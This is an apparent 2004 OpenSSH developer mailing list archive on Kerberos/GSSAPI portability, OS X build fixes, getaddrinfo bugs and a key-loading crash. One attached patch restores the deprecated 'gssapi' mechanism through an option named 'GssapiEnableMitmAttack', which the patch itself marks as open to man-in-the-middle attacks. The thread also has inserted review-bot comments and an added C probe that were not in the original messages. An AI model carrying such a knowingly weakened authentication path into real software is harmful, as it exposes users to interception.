From Sergio.Gelato at astro.su.se Mon Mar 1 00:27:00 2004 From: Sergio.Gelato at astro.su.se (Sergio Gelato) Date: Sun, 29 Feb 2004 14:27:00 +0100 Subject: OPenAFS and OpenSSH replacing kafs In-Reply-To: References: <20040228224005.GA5725@astro.su.se> Message-ID: <20040229132658.GA15093@astro.su.se> * Ben Lindstrom [2004-02-28 18:36:03 -0600]: > I have patches for OS/X to compile. I'll work on finalizing this because > some of this needs to go upstream (I plan on gutting the krb5_init_ets() > since it is a private API and is not needed on most systems). I need to > track down why extactly zlib.h hates being where it is, but this at least > is a workaround. The Kerberos framework includes which defines TARGET_OS_MAC, and /usr/include/zconv.h inexplicably suppresses the "typedef unsigned char Byte;" line in that case. Looks like a simple case of broken headers. For my builds I'll just copy zlib.h and zconv.h to the build directory, patch the copy of zconv.h and continue. Your solution of including zlib.h before krb5.h is probably also OK as a workaround. Your patches seem to be missing the SessionCreate() calls to the Security framework (the moral equivalent to setpag() I believe). Also, Michaud's patch was using the CCache API to manage the Kerberos credentials when linking against the Kerberos framework. That sort of detail could make the difference between "compiles" and "works". But we'll see; I'll try to find time to work on this on Monday. > > - Ben > > Index: auth-krb5.c > =================================================================== > RCS file: /var/cvs/openssh/auth-krb5.c,v > retrieving revision 1.21 > diff -u -r1.21 auth-krb5.c > --- auth-krb5.c 22 Nov 2003 01:11:06 -0000 1.21 > +++ auth-krb5.c 24 Feb 2004 07:13:56 -0000 
> @@ -54,7 +54,9 @@ > problem = krb5_init_context(&authctxt->krb5_ctx); > if (problem) > return (problem); > +#ifndef __APPLE__ /* XXX OS/X claims to not need this */ > krb5_init_ets(authctxt->krb5_ctx); > +#endif > } > return (0); > } > Index: gss-serv-krb5.c > =================================================================== > RCS file: /var/cvs/openssh/gss-serv-krb5.c,v > retrieving revision 1.5 > diff -u -r1.5 gss-serv-krb5.c > --- gss-serv-krb5.c 23 Feb 2004 23:37:33 -0000 1.5 > +++ gss-serv-krb5.c 24 Feb 2004 07:13:59 -0000 > @@ -65,7 +65,9 @@ > logit("Cannot initialize krb5 context"); > return 0; > } > +#ifndef __APPLE__ /* Apple Claims OS/X does not need it */ > krb5_init_ets(krb_context); > +#endif > > return 1; > } > Index: monitor.c > =================================================================== > RCS file: /var/cvs/openssh/monitor.c,v > retrieving revision 1.64 > diff -u -r1.64 monitor.c > --- monitor.c 6 Feb 2004 05:40:27 -0000 1.64 > +++ monitor.c 24 Feb 2004 07:14:01 -0000 > @@ -33,11 +33,12 @@ > #include > #endif > > +#include "zlib.h" > + > #include "ssh.h" > #include "auth.h" > #include "kex.h" > #include "dh.h" > -#include "zlib.h" > #include "packet.h" > #include "auth-options.h" > #include "sshpty.h" > Index: monitor_wrap.c > =================================================================== > RCS file: /var/cvs/openssh/monitor_wrap.c,v > retrieving revision 1.40 > diff -u -r1.40 monitor_wrap.c > --- monitor_wrap.c 21 Nov 2003 12:56:47 -0000 1.40 > +++ monitor_wrap.c 24 Feb 2004 07:14:02 -0000 > @@ -30,6 +30,8 @@ > #include > #include > > +#include "zlib.h" > + > #include "ssh.h" > #include "dh.h" > #include "kex.h" > @@ -40,7 +42,6 @@ > #include "packet.h" > #include "mac.h" > #include "log.h" > -#include "zlib.h" > #include "monitor.h" > #include "monitor_wrap.h" > #include "xmalloc.h" > From djm at mindrot.org Mon Mar 1 10:41:32 2004 
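Review bot: In the auth-krb5.c and gss-serv-krb5.c hunks, the "#ifndef __APPLE__" guard around krb5_init_ets() keys on the platform rather than on the Kerberos library that is actually linked, so any OS X build loses the call whichever Kerberos it uses. The two comments also disagree in wording ("XXX OS/X claims to not need this" and "Apple Claims OS/X does not need it") and cite nothing. Suggest a configure-time check for krb5_init_ets() and one shared comment that says why the call can be skipped.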
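Review bot: The monitor.c and monitor_wrap.c hunks move #include "zlib.h" above "ssh.h" without a comment, so the ordering dependency is invisible and the next include cleanup can silently undo it. Add a one-line comment at the moved include saying that zlib.h has to be seen before krb5.h on OS X, or do the reordering once in a shared header instead of per file.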
From: djm at mindrot.org (Damien Miller)
Date: Mon, 1 Mar 2004 10:41:32 +1100 (EST)
Subject: Change request For OpenSSH 3.8p1
In-Reply-To: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com>
References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com>
Message-ID:

I've been away from mail for a couple of days, so I am catching up on
this rather amusing thread.

On Sat, 28 Feb 2004, John Davidorff Pell wrote:

> I'm not terribly interested in having threads or not having threads, it
> was the This Will Never Happen Because I Say So And Am G-d attitude
> that shocked me.

It isn't because "I" say so - you are making incorrect assumptions. For
instance, if I just did what I wanted, threads would have been removed
by now (and probably a bit more too).

I am quite sure that I speak for all the developers when I say that we
don't want threads used in OpenSSH.

-d

From stuge-openssh-unix-dev at cdy.org Mon Mar 1 12:02:06 2004
From: stuge-openssh-unix-dev at cdy.org (Peter Stuge)
Date: Mon, 1 Mar 2004 02:02:06 +0100
Subject: Change request For OpenSSH 3.8p1
In-Reply-To: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com>
References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com>
Message-ID: <20040301010206.GD13984@foo.birdnet.se>

On Sat, Feb 28, 2004 at 03:32:30PM -0800, John Davidorff Pell wrote:
> no idea who he is. however, this being a Free Software package, I
> expected this kind of decision not to be made by one person, or is
> Damien the one we worship around here?

It's been made by a whole bunch of very competent persons, some time
ago. Long before your post.

I'm sorry that you may have gotten the impression that OpenSSH is ruled
by Damien, although I don't think too many would mind if it was, that
isn't the case, it's just that he was the first one to respond to your
question with the developer consensus.

I'm also sorry you don't seem to mind getting tangled in threads, since
it can really kill performance and security, which by the way happens
to be two things I really appreciate in OpenSSH.

I'll refrain from making a sarcastic Windows+threads=true comment now.

Please trust that OpenSSH is a functional open source project, and if
you doubt that it really is, spend some time to read up on the subject
and comment on shortcomings with good background. Or even better, file
a bug about the project in bugzilla! =)

All the best to you and everyone else helping out in this great project!

//Peter

From kumaresh_ind at gmx.net Tue Mar 2 00:05:28 2004
From: kumaresh_ind at gmx.net (Kumaresh)
Date: Mon, 1 Mar 2004 18:35:28 +0530
Subject: GSSAPI support in 3.8 ?
Message-ID: <02e401c3ff8d$e6a76eb0$230110ac@kurco>

Hi All,

From Changelog with 3.8:
"The experimental "gssapi" support has been replaced with the
"gssapi-with-mic" to fix possible MITM attacks.The two versions are not
compatible."

I am using OpenSSH-3.6 with Simon's patch and OpenSSH-3.7 built with
GSSAPI support. The latest version OpenSSH-3.8 is not working with 3.6
or 3.7 with GSSAPI authentication. I have seen this in changelog, but my
question is, can anybody explain briefly justifying this change in 3.8
and about MITM attacks?

Because, I am afraid that in a large network that uses GSSAPI for
authentication, the new OpenSSH has to be reinstalled on all the systems
as the latest version is not compatible with older ones.

Thanks,
Kumar.

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004

From dtucker at zip.com.au Tue Mar 2 00:18:23 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Tue, 02 Mar 2004 00:18:23 +1100
Subject: GSSAPI support in 3.8 ?
In-Reply-To: <02e401c3ff8d$e6a76eb0$230110ac@kurco>
References: <02e401c3ff8d$e6a76eb0$230110ac@kurco>
Message-ID: <4043381F.4010305@zip.com.au>

Kumaresh wrote:
> From Changelog with 3.8:
> "The experimental "gssapi" support has been replaced with the
> "gssapi-with-mic" to fix possible MITM attacks.The two versions are not
> compatible."
>
> I am using OpenSSH-3.6 with Simon's patch and OpenSSH-3.7 built with GSSAPI
> support. The latest version OpenSSH-3.8 is not working with 3.6 or 3.7 with
> GSSAPI authentication. I have seen this in changelog, but my question is,
> can anybody explain briefly justifying this change in 3.8 and about MITM
> attacks?

I don't know much GSSAPI, but from what I recall it was because the
draft protocol standard has changed:

http://www.ietf.org/internet-drafts/draft-ietf-secsh-gsskeyex-07.txt

[quote]
11. Changes the last version

This section lists important changes since the previous version of
this internet-draft. This section should be removed at the time of
publication of this document as an RFC.

o Changed "gssapi" to "gssapi-with-mic", and added the description
  and semantics of the SSH_MSG_USERAUTH_GSSAPI_MIC message.
[/quote]

> Because, I am afraid that in a large network that uses GSSAPI for
> authentication, the new OpenSSH has to be reinstalled on all the systems as
> the latest version is not compatible with older ones.

I had heard that Simon was going to provide a patch for backward
compatibility for one OpenSSH version. I'm not sure what the status of
that is.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From mouring at etoh.eviladmin.org Tue Mar 2 08:25:08 2004
From: mouring at etoh.eviladmin.org (Ben Lindstrom)
Date: Mon, 1 Mar 2004 15:25:08 -0600 (CST)
Subject: OPenAFS and OpenSSH replacing kafs
In-Reply-To: <20040229132658.GA15093@astro.su.se>
Message-ID:

On Sun, 29 Feb 2004, Sergio Gelato wrote:

> * Ben Lindstrom [2004-02-28 18:36:03 -0600]:
> > I have patches for OS/X to compile. I'll work on finalizing this because
> > some of this needs to go upstream (I plan on gutting the krb5_init_ets()
> > since it is a private API and is not needed on most systems). I need to
> > track down why exactly zlib.h hates being where it is, but this at least
> > is a workaround.
>
> The Kerberos framework includes which defines
> TARGET_OS_MAC, and /usr/include/zconv.h inexplicably suppresses the
> "typedef unsigned char Byte;" line in that case. Looks like a simple
> case of broken headers. For my builds I'll just copy zlib.h and zconv.h
> to the build directory, patch the copy of zconv.h and continue. Your
> solution of including zlib.h before krb5.h is probably also OK as a
> workaround.

If this is a real bug in the headers, then Apple should be informed and
they should correct the issue.

> Your patches seem to be missing the SessionCreate() calls to the
> Security framework (the moral equivalent to setpag() I believe).
> Also, Michaud's patch was using the CCache API to manage the Kerberos
> credentials when linking against the Kerberos framework. That sort of
> detail could make the difference between "compiles" and "works". But
> we'll see; I'll try to find time to work on this on Monday.
>

This is a separate issue. If you look at the Apple source code it is an
optional patch for CCache API. Unless Apple has stripped out the other
forms of fetching credentials.

I have no qualms importing CCache API if one is presented to me. Just
not sure I liked the way Apple did it. But I only took a few moments
glance at it.

- Ben

From Nicolas.Williams at sun.com Tue Mar 2 09:11:53 2004
From: Nicolas.Williams at sun.com (Nicolas Williams)
Date: Mon, 1 Mar 2004 16:11:53 -0600
Subject: OPenAFS and OpenSSH replacing kafs
Message-ID: <20040301221153.GZ10922@binky.central.sun.com>

Markus asks:

> if GSSAPI is the great generic security server API it claims
> to be, then it can hide all this stuff from sshd.

Correct, the GSS-API has gaps, such as:

 - There's no way to make delegated GSS credentials available for
   acquisition through GSS_Acquire_cred()/GSS_Add_cred().

   See:

   http://www.ietf.org/internet-drafts/draft-williams-gssapi-store-deleg-creds-00.txt

   for a proposed solution which involves adding a function,
   GSS_Store_cred(), for storing gss_cred_id_t's in the "current"
   credentials store. Manipulation of credential stores is left as
   platform-specific, or for future extensions.

   The only objection I've had to this has been that GSS_Store_cred()
   does not seem to allow for per-session credential stores, however I
   do believe that PAM and GSS_Store_cred() could interact such that
   this is not an issue.

   This is the biggest gap in the GSS-API.

 - There's no way to inquire a mechanism for its "features." E.g.,
   there's no way to know if a mechanism indicated by
   GSS_Indicate_mechs() is SPNEGO or otherwise negotiates mechanisms,
   which, as we know, must not be used in SSHv2.

Note that authorization is not, however, an area where the GSS-API has
gaps, but it is an area which may be handled differently on different
platforms -- a consideration for portable code.

Cheers,

Nico
--

From Sergio.Gelato at astro.su.se Tue Mar 2 11:27:37 2004
From: Sergio.Gelato at astro.su.se (Sergio Gelato)
Date: Tue, 2 Mar 2004 01:27:37 +0100
Subject: OPenAFS and OpenSSH replacing kafs
In-Reply-To:
References: <20040229132658.GA15093@astro.su.se>
Message-ID: <20040302002736.GA311@astro.su.se>

* Ben Lindstrom [2004-03-01 15:25:08 -0600]:
> If this is a real bug in the headers, then Apple should be informed and
> they should correct the issue.

I'll see about filing a bug report. However, it's a minor problem (easy
to work around).

> This is a separate issue. If you look at the Apple source code it is an
> optional patch for CCache API. Unless Apple has stripped out the other
> forms of fetching credentials.

There are actually two -D symbols, USE_CCAPI (which does little more
than replacing FILE: with API: in the credentials cache specification)
and USE_SECURITY_SESSION_API (which seems highly desirable, except on a
standard 10.3 install where sshd is always started by xinetd; in the
latter case xinetd already does the job and the corresponding code in
sshd is idempotent).

You are correct that the patches are optional, in the sense that sshd
will work without them. klist seems to default to API: rather than FILE:
when KRB5CCNAME doesn't specify the cache type, but that's a minor
annoyance (and a hint that Apple prefers the API: cache type).

... I think I've found a bug in session.c:

	if (s->authctxt->krb5_ticket_file)
		child_set_env(&env, &envsize, "KRB5CCNAME",
		    s->authctxt->krb5_ticket_file);

should probably prefix an explicit "FILE:" to the value of
s->authctxt->krb5_ticket_file. The GSSAPI code gets this right, but the
Kerberos password code doesn't. Should we fix this in session.c or in
auth-krb5.c ?

On a different note, it seems that (as of version 71 of System.B)
getaddrinfo() is still broken, in that it does not fail with EAI_NONAME
when the AI_NUMERICHOST hint is given and the nodename is non-numeric.
I'm getting erroneous "Nasty PTR record" warnings as a result, and I bet
this also explains the tcp-wrappers configuration anomalies I've
observed on 10.3. That's probably also worth a bug report to Apple. Will
see if I can come up with an improved test for BROKEN_GETADDRINFO in
configure.ac, one that does more than just look at the library version
number.

My top priority at the moment, though, is to sort out the MIC
verification failures I'm having. (They appear to correlate with the
client using Heimdal and the server MIT, so I'm smelling an
interoperability issue between the two. Probably an already-known one.)

From dtucker at zip.com.au Tue Mar 2 14:22:48 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Tue, 02 Mar 2004 14:22:48 +1100
Subject: OPenAFS and OpenSSH replacing kafs
In-Reply-To: <20040302002736.GA311@astro.su.se>
References: <20040229132658.GA15093@astro.su.se> <20040302002736.GA311@astro.su.se>
Message-ID: <4043FE08.4060005@zip.com.au>

Hi.

Sergio Gelato wrote:
> Will see if I can
> come up with an improved test for BROKEN_GETADDRINFO in configure.ac,
> one that does more than just look at the library version number.

I have a cruddy stand-alone program that emulates most of what sshd does
during the name/address lookups and bind() (while spitting out
debugging). It could probably be turned into a usable test program by
just deleting lines.

If it's of any use to you, you're welcome to it:
http://www.zip.com.au/~dtucker/openssh/getaddrinfotest.c

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From sunfaina-web at yahoo.co.jp Tue Mar 2 14:51:07 2004
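A behavioural probe for the getaddrinfo() defect discussed in the two messages above, as an added example (it is not code from OpenSSH, from configure.ac, or from the getaddrinfotest.c linked above). It tests what the resolver does rather than the library version, and shows why a resolver that ignores AI_NUMERICHOST makes an "is this reverse-lookup name really an address literal?" check fire on ordinary hostnames. The function names and the sample hostnames are hypothetical.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L
#endif
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

/*
 * Resolve `name` with AI_NUMERICHOST set. The hint forbids any name
 * service lookup, so only address literals may succeed.
 * Returns the raw getaddrinfo() status: 0 on success, EAI_* otherwise.
 */
int numeric_lookup(const char *name)
{
	struct addrinfo hints, *ai = NULL;
	int rc;

	memset(&hints, 0, sizeof(hints));
	hints.ai_family = AF_UNSPEC;
	hints.ai_socktype = SOCK_DGRAM;	/* dummy, limits the result list */
	hints.ai_flags = AI_NUMERICHOST;
	rc = getaddrinfo(name, NULL, &hints, &ai);
	if (rc == 0 && ai != NULL)
		freeaddrinfo(ai);
	return rc;
}

/*
 * Probe suitable for a configure-style test program:
 * returns 1 when AI_NUMERICHOST is honoured, 0 when it is not.
 */
int getaddrinfo_numerichost_ok(void)
{
	/* Address literals must be accepted. */
	if (numeric_lookup("127.0.0.1") != 0)
		return 0;
	if (numeric_lookup("::1") != 0)
		return 0;
	/* A hostname must be rejected with EAI_NONAME, not resolved. */
	if (numeric_lookup("not-numeric.example") != EAI_NONAME)
		return 0;
	return 1;
}

/*
 * The kind of check a server can apply to a name obtained from a PTR
 * record: a "hostname" that parses as an address literal is suspicious.
 * With a broken getaddrinfo() this returns 1 for every resolvable name,
 * which matches the erroneous warnings described above.
 */
int ptr_name_is_numeric(const char *name)
{
	return numeric_lookup(name) == 0;
}

int main(void)
{
	/* Constructed sample names, not taken from any real log. */
	const char *samples[] = { "192.0.2.10", "host.example", NULL };
	int i;

	printf("AI_NUMERICHOST honoured: %s\n",
	    getaddrinfo_numerichost_ok() ? "yes" : "no (broken)");
	for (i = 0; samples[i] != NULL; i++)
		printf("%-14s numeric=%d\n", samples[i],
		    ptr_name_is_numeric(samples[i]));
	return getaddrinfo_numerichost_ok() ? 0 : 1;
}
```

The exit status is 0 on a conforming resolver, so the program can be used directly as a run test; it makes no network queries because every lookup carries AI_NUMERICHOST.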
From couannette at free.fr Tue Mar 2 21:56:06 2004
From: couannette at free.fr (Couannette)
Date: Tue, 02 Mar 2004 11:56:06 +0100
Subject: openssh 3.8p1 on Linux
Message-ID: <40446846.8080508@free.fr>

Hello,

I'm having trouble with OpenSSH on Linux.
Here is attached the regression tests log - it'll explain what my
problems are. This causes sshd to die with this output:

buffer_get: trying to get more bytes 1 than in buffer 0

ssh would also die with this message. I recreated my user keys, and it
works now. remote sshd is 3.7.1p2.
But sshd won't start even after recreating server keys. Even after
recreating moduli file as explained in man ssh-keygen.

I'm running Lunar Linux (source based distro), with kernel 2.4.24, glibc
2.3.2, gcc 3.2.3. I have an AMD uP.

I tried to debug sshd with gdb but I can't find any clue at this stage.
strace tells me that sshd, after opening /etc/ssh/ssh_host_key calls
read with size=0 ( read(3, "", 0) = 0 ). That sounds weird, isn't it ?

Please help, thank you in advance,
Couannette

Log:

root at bubus /usr/src/openssh-3.8p1 # make tests
(cd openbsd-compat && make)
make[1]: Entering directory `/usr/src/openssh-3.8p1/openbsd-compat'
make[1]: Nothing to be done for `all'.
make[1]: Leaving directory `/usr/src/openssh-3.8p1/openbsd-compat'
BUILDDIR=`pwd`; \
[ -d `pwd`/regress ] || mkdir -p `pwd`/regress; \
[ -f `pwd`/regress/Makefile ] || \
ln -s ./regress/Makefile `pwd`/regress/Makefile ; \
TEST_SHELL="/bin/bash"; \
TEST_SSH_SSH="${BUILDDIR}/ssh"; \
TEST_SSH_SSHD="${BUILDDIR}/sshd"; \
TEST_SSH_SSHAGENT="${BUILDDIR}/ssh-agent"; \
TEST_SSH_SSHADD="${BUILDDIR}/ssh-add"; \
TEST_SSH_SSHKEYGEN="${BUILDDIR}/ssh-keygen"; \
TEST_SSH_SSHKEYSCAN="${BUILDDIR}/ssh-keyscan"; \
TEST_SSH_SFTP="${BUILDDIR}/sftp"; \
TEST_SSH_SFTPSERVER="${BUILDDIR}/sftp-server"; \
cd ./regress || exit $?; \
make \
.OBJDIR="${BUILDDIR}/regress" \
.CURDIR="`pwd`" \
BUILDDIR="${BUILDDIR}" \
OBJ="${BUILDDIR}/regress/" \
PATH="${BUILDDIR}:${PATH}" \
TEST_SHELL="${TEST_SHELL}" \
TEST_SSH_SSH="${TEST_SSH_SSH}" \
TEST_SSH_SSHD="${TEST_SSH_SSHD}" \
TEST_SSH_SSHAGENT="${TEST_SSH_SSHAGENT}" \
TEST_SSH_SSHADD="${TEST_SSH_SSHADD}" \
TEST_SSH_SSHKEYGEN="${TEST_SSH_SSHKEYGEN}" \
TEST_SSH_SSHKEYSCAN="${TEST_SSH_SSHKEYSCAN}" \
TEST_SSH_SFTP="${TEST_SSH_SFTP}" \
TEST_SSH_SFTPSERVER="${TEST_SSH_SFTPSERVER}" \
EXEEXT="" \
tests
make[1]: Entering directory `/usr/src/openssh-3.8p1/regress'
ssh-keygen -if /usr/src/openssh-3.8p1/regress/rsa_ssh2.prv | diff - /usr/src/openssh-3.8p1/regress/rsa_openssh.prv
cat /usr/src/openssh-3.8p1/regress/rsa_openssh.prv > /usr/src/openssh-3.8p1/regress//t2.out
chmod 600 /usr/src/openssh-3.8p1/regress//t2.out
ssh-keygen -yf /usr/src/openssh-3.8p1/regress//t2.out | diff - /usr/src/openssh-3.8p1/regress/rsa_openssh.pub
buffer_get: trying to get more bytes 1 than in buffer 0
0a1
> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDsilwKcaKN6wSMNd1WgQ9+HRqQEkD0kCTVttrazGu0OhBU3Uko+dFD1Ip0CxdXmN25JQWxOYF7h/Ocu8P3jzv3RTX87xKR0YzlXTLX+SLtF/ySebS3xWPrlfRUDhh03hR5V+8xxvvy9widPYKw/oItwGSueOsEq1LTczCDv2dAjQ==
make[1]: *** [t2] Error 1
make[1]: Leaving directory `/usr/src/openssh-3.8p1/regress'
make: *** [tests] Error 2
root at bubus /usr/src/openssh-3.8p1 #

excerpt of sshd strace output:

open("/etc/ssh/sshd_config", O_RDONLY|O_LARGEFILE) = 3
fstat64(3, {st_mode=S_IFREG|0600, st_size=2425, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(3, "#\t$OpenBSD: sshd_config,v 1.59 2"..., 4096) = 2425
read(3, "", 4096) = 0
close(3) = 0
munmap(0x40017000, 4096) = 0
open("/etc/ssh/ssh_host_key", O_RDONLY|O_LARGEFILE) = 3
fstat64(3, {st_mode=S_IFREG|0600, st_size=525, ...}) = 0
getuid32() = 0
fstat64(3, {st_mode=S_IFREG|0600, st_size=525, ...}) = 0
brk(0) = 0x809a000
brk(0x809b000) = 0x809b000
read(3, "", 0) = 0
write(2, "buffer_get: trying to get more b"..., 57buffer_get: trying to get more bytes 1 than in buffer 0
) = 57
exit_group(255) = ?

From djm at mindrot.org Tue Mar 2 22:05:12 2004
From: djm at mindrot.org (Damien Miller)
Date: Tue, 2 Mar 2004 22:05:12 +1100 (EST)
Subject: openssh 3.8p1 on Linux
In-Reply-To: <40446846.8080508@free.fr>
References: <40446846.8080508@free.fr>
Message-ID:

On Tue, 2 Mar 2004, Couannette wrote:

> Hello,
>
> I'm having trouble with OpenSSH on Linux.
> Here is attached the regression tests log - it'll explain what my
> problems are. This cause sshd to die with this output:
>
> buffer_get: trying to get more bytes 1 than in buffer 0

Please send server debug output "sshd -ddd", an error without context
isn't much help...

-d

From deengert at anl.gov Wed Mar 3 00:10:44 2004
From: deengert at anl.gov (Douglas E. Engert)
Date: Tue, 02 Mar 2004 07:10:44 -0600
Subject: OPenAFS and OpenSSH replacing kafs
References: <20040301221153.GZ10922@binky.central.sun.com>
Message-ID: <404487D4.8C986DC1@anl.gov>

Nicolas Williams wrote:
>
> Markus asks:
>
> > if GSSAPI is the great generic security server API it claims
> > to be, then it can hide all this stuff from sshd.
>
> Correct, the GSS-API has gaps, such as:
>
>  - There's no way to make delegated GSS credentials available for
>    acquisition through GSS_Acquire_cred()/GSS_Add_cred().
>
>    See:
>
>    http://www.ietf.org/internet-drafts/draft-williams-gssapi-store-deleg-creds-00.txt

Also see:
http://www.ietf.org/internet-drafts/draft-engert-ggf-gss-extensions-00.txt
which defines a gss_export_cred which handles exporting of the delegated
cred, and includes gss_inquire_sec_context_by_oid call and
gss_inquire_cred_by_oid to address your inquiry problems.

This draft was produced by the Global Grid Forum http://www.ggf.org

>
>    for a proposed solution which involves adding a function,
>    GSS_Store_cred(), for storing gss_cred_id_t's in the "current"
>    credentials store. Manipulation of credential stores is left as
>    platform-specific, or for future extensions.
>
>    The only objection I've had to this has been that GSS_Store_cred()
>    does not seem to allow for per-session credential stores, however I
>    do believe that PAM and GSS_Store_cred() could interact such that
>    this is not an issue.
>
>    This is the biggest gap in the GSS-API.
>
>  - There's no way to inquire a mechanism for its "features." E.g.,
>    there's no way to know if a mechanism indicated by
>    GSS_Indicate_mechs() is SPNEGO or otherwise negotiates mechanisms,
>    which, as we know, must not be used in SSHv2.
>
> Note that authorization is not, however, an area where the GSS-API has
> gaps, but it is an area which may be handled differently on different
> platforms -- a consideration for portable code.
>
> Cheers,
>
> Nico
> --
>
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> http://www.mindrot.org/mailman/listinfo/openssh-unix-dev

--

Douglas E. Engert
Argonne National Laboratory
9700 South Cass Avenue
Argonne, Illinois 60439
(630) 252-5444

From sxw at inf.ed.ac.uk Wed Mar 3 08:15:26 2004
From: sxw at inf.ed.ac.uk (sxw at inf.ed.ac.uk)
Date: Tue, 2 Mar 2004 21:15:26 +0000 (GMT)
Subject: GSSAPI support in 3.8 ?
In-Reply-To: <4043381F.4010305@zip.com.au>
Message-ID:

On Tue, 2 Mar 2004, Darren Tucker wrote:

> I don't know much GSSAPI, but from what I recall it was because the
> draft protocol standard has changed:

The protocol was changed because of concerns that it didn't tie the SSH
session ID with the context established through GSSAPI. It was felt that
this didn't provide sufficient protection against certain active
man-in-the-middle attacks.

> > Because, I am afraid that in a large network that uses GSSAPI for
> > authentication, the new OpenSSH has to be reinstalled on all the systems as
> > the latest version is not compatible with older ones.
>
> I had heard that Simon was going to provide a patch for backward
> compatibility for one OpenSSH version. I'm not sure what the status of
> that is.

I've now completed testing some minimal patches for backwards
compatibility. They're attached to this email. Please note that these
patches are made available purely for the purpose of simplifying the
migration path - new users should have no need for them.

Instructions for their use are at the beginning of the patch.

Cheers,

Simon.

-------------- next part --------------
The patch below adds support for the deprecated 'gssapi' authentication
mechanism to OpenSSH 3.8p1. The newer 'gssapi-with-mic' mechanism is
included in this release. The use of 'gssapi' is deprecated due to the
presence of potential man-in-the-middle attacks, which
'gssapi-with-mic' is not susceptible to.

To use the patch apply it to an OpenSSH 3.8p1 source tree. After
compiling, backwards compatibility may be obtained by supplying the
'GssapiEnableMitmAttack yes' option to either the client or server.

It should be noted that this patch is being made available purely as a
means of easing the process of moving to OpenSSH 3.8p1.
Any new installations are recommended to use the 'gssapi-with-mic' mechanism. Existing installations are encouraged to upgrade as soon as possible. Index: auth2-gss.c =================================================================== RCS file: /cvs/openssh/auth2-gss.c,v retrieving revision 1.8 diff -u -r1.8 auth2-gss.c --- auth2-gss.c 21 Nov 2003 12:56:47 -0000 1.8 +++ auth2-gss.c 2 Mar 2004 20:47:28 -0000 @@ -171,6 +171,15 @@ dispatch_set( SSH2_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE, &input_gssapi_exchange_complete); + + /* + * Old style 'gssapi' didn't have the GSSAPI_MIC + * and went straight to sending exchange_complete + */ + if (options.gss_enable_mitm) + dispatch_set( + SSH2_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE, + &input_gssapi_exchange_complete); } } @@ -290,6 +299,12 @@ "gssapi-with-mic", userauth_gssapi, &options.gss_authentication +}; + +Authmethod method_gssapi_old = { + "gssapi", + userauth_gssapi, + &options.gss_enable_mitm }; #endif /* GSSAPI */ Index: auth2.c =================================================================== RCS file: /cvs/openssh/auth2.c,v retrieving revision 1.126 diff -u -r1.126 auth2.c --- auth2.c 17 Nov 2003 10:13:41 -0000 1.126 +++ auth2.c 2 Mar 2004 20:47:28 -0000 @@ -54,6 +54,7 @@ extern Authmethod method_hostbased; #ifdef GSSAPI extern Authmethod method_gssapi; +extern Authmethod method_gssapi_old; #endif Authmethod *authmethods[] = { @@ -61,6 +62,7 @@ &method_pubkey, #ifdef GSSAPI &method_gssapi, + &method_gssapi_old, #endif &method_passwd, &method_kbdint, Index: readconf.c =================================================================== RCS file: /cvs/openssh/readconf.c,v retrieving revision 1.102 diff -u -r1.102 readconf.c --- readconf.c 17 Dec 2003 05:33:11 -0000 1.102 +++ readconf.c 2 Mar 2004 20:47:28 -0000 
@@ -104,7 +104,7 @@ oHostKeyAlgorithms, oBindAddress, oSmartcardDevice, oClearAllForwardings, oNoHostAuthenticationForLocalhost, oEnableSSHKeysign, oRekeyLimit, oVerifyHostKeyDNS, oConnectTimeout, - oAddressFamily, oGssAuthentication, oGssDelegateCreds, + oAddressFamily, oGssAuthentication, oGssDelegateCreds, oGssEnableMITM, oServerAliveInterval, oServerAliveCountMax, oDeprecated, oUnsupported } OpCodes; @@ -139,9 +139,11 @@ #if defined(GSSAPI) { "gssapiauthentication", oGssAuthentication }, { "gssapidelegatecredentials", oGssDelegateCreds }, + { "gssapienablemitmattack", oGssEnableMITM }, #else { "gssapiauthentication", oUnsupported }, { "gssapidelegatecredentials", oUnsupported }, + { "gssapienablemitmattack", oUnsupported }, #endif { "fallbacktorsh", oDeprecated }, { "usersh", oDeprecated }, @@ -394,6 +396,10 @@ case oGssDelegateCreds: intptr = &options->gss_deleg_creds; goto parse_flag; + + case oGssEnableMITM: + intptr = &options->gss_enable_mitm; + goto parse_flag; case oBatchMode: intptr = &options->batch_mode; @@ -829,6 +835,7 @@ options->challenge_response_authentication = -1; options->gss_authentication = -1; options->gss_deleg_creds = -1; + options->gss_enable_mitm = -1; options->password_authentication = -1; options->kbd_interactive_authentication = -1; options->kbd_interactive_devices = NULL; @@ -907,6 +914,8 @@ options->gss_authentication = 0; if (options->gss_deleg_creds == -1) options->gss_deleg_creds = 0; + if (options->gss_enable_mitm == -1) + options->gss_enable_mitm = 0; if (options->password_authentication == -1) options->password_authentication = 1; if (options->kbd_interactive_authentication == -1) Index: readconf.h =================================================================== RCS file: /cvs/openssh/readconf.h,v retrieving revision 1.51 diff -u -r1.51 readconf.h --- readconf.h 17 Dec 2003 05:33:11 -0000 1.51 +++ readconf.h 2 Mar 2004 20:47:28 -0000 
